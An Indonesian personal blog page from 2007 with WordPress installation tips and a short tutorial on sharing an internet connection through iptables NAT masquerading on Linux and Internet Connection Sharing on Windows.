mysql>flush privileges;Untuk pemakai cPanel bukalah Mysql Handler anda, tinggal buat database, user, dan password.
Kopilah file wp-config-sample.php menjadi wp-config.php, Kemudian editlah dengan menggunakan editor teks seperti notepad, vi, mcedit dan lain lainnya. Sesuaikan nama database dengan database yang telah kita buat. Simpan
Zip lagi dan Upload. Proses edit bisa dilakukan juga di server. Cpanel juga support kok dengan extract dan edit..

The image “http://geocities.com/bimosaurus/cpannel.GIF” cannot be displayed, because it contains errors.

Semua cms hampir sama caranya.. Nah selamat mencoba dan selamat publish diri di internet..
Setelah ter upload, selanjutnya bukalah web kita dengan menggunakan web browser. Nah, nantinya akan ada proses installasi management web lebih lanjut melalui web browser. INGAT!! Jika anda lakukan di internet, harap dilakukan secepatnya proses installasi di web browser tersebut. Karena saya pernah ada kejadian, saya secara iseng dapat link dan termuat halaman proses installasi web server WordPress milik http://jaf.suarane.com. Yang akhirnya ternyata menimbulkan sedikit konflik antara pak Jaf dengan pihak web hosting. Proses installasi diakhiri dengan penghapusan / rename file di ../../wordpress/wp-admin/install.php untuk menghindari file ini terakses oleh orang lain. Proses installasi baru, akan menghapus/menimpa database yang lama dengan database yang baru

Silakan di copy paste postingan ini. jangan lupa untuk memberi masukan pada saya kali aja ada yang terlompati atau kliru.. Bisa juga anda request sesuatu ke email saya di sindoro@gmail.com.

Tinggalkan sebuah Komentar

Masquerading vs Internet Connection Sharing (gateway)

April 19, 2007, 1:11 am
Diarsipkan di bawah: Linux, Networking

Banyak diantara teman-teman admin yang memiliki masalah dengan membagi jaringan internet ke jaringan lokal dari komputer Gateway/Router. Nah berikut tipsnya:

Untuk linux, sangat gampang..

1. Lihat dulu interface jaringan yang ada pada komputer gateway. Biasanya lebih dari satu.
2. Tentukan interface mana yang menghadap ke internet/sisi publik..
3. Tambahkan command iptables ini pada firewall

iptables -t nat -I POSTROUTING -o namadevice -j MASQUREADE

contoh

iptables -t nat -I POSTROUTING -o eth0 -j MASQUERADE

Dengan perintah ini juga kita juga bisa melakukan IP Forwarding terhadap IP – IP tertentu , mana yang boleh masuk ke internet, mana yang tidak boleh. Misalnya:

iptables -t nat -I POSTROUTING -s 192.168.2.0/24 -j MASQUERADE. Dengan catatan perintah yang diatas tadi tidak dijalankan

PRoses forward ip bisa juga dilakukan dengan cara
selalu

tambahkan dalam file /etc/rc.local anda seperti ini

echo “1″ > /proc/sys/net/ipv4/ip_forward

nilai ini selalu akan berganti menjadi 0 jika komputer di reboot/dimatikan.

Untuk Windows, buka dulu Network Connectionnya dari Start Setting ..
Carilah interface yang berhubungan dengan internet. Misalnya adalah Network Connection1, Klik kanan, Propoerties dan carilah Advanced

The image “http://geocities.com/bimosaurus/ics.JPG” cannot be displayed, because it contains errors.

Check, centanglah tanda Allow network User bla bla bla. Maka interface yang satunya akan segera membuat IP address baru 192.168.0.1 yang kita nanti juga bisa menggantinya.
Nah.. gampang khan?

1 Komentar

sebelumnya »

Halaman Berikutnya »

Bodhon: Sampai Saya Yang Terbodoh itu Tahu.. Silakan Copy Paste (by bimosaurus)

Kategori

Arsip

Tautan